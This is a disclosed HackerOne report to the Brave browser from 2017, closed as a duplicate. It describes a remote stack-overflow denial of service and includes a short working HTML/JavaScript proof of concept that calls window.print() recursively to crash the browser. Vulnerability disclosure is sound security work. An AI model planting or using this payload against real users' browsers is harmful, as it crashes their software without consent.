Remote Stack Overflow Vulnerability (DoS)

Disclosed: 2017-08-10 05:11:04 By kjashwanth13 To brave
Unknown
Vulnerability Details
Allows remote attackers to cause a denial of service (application crash) resulting in stack overflow via nested calls to the window.print javascript function. <html> <title>Remote Stack Overflow DoS PoC</title> <body bgcolor="#50708C"> <center> <p><font color="#e3e3e3">Remote Stack Overflow DoS PoC</font></p> <button onClick=crash()>Execute!</button> </center> <script> function crash(){ window.print(); crash(); } </script> </body> </html> Poc : Please find attached file POC Video Reference Link : https://www.exploit-db.com/exploits/33951/
Actions
View on HackerOne
Report Stats
  • Report ID: 181061
  • State: Closed
  • Substate: duplicate
  • Upvotes: 1
Share this report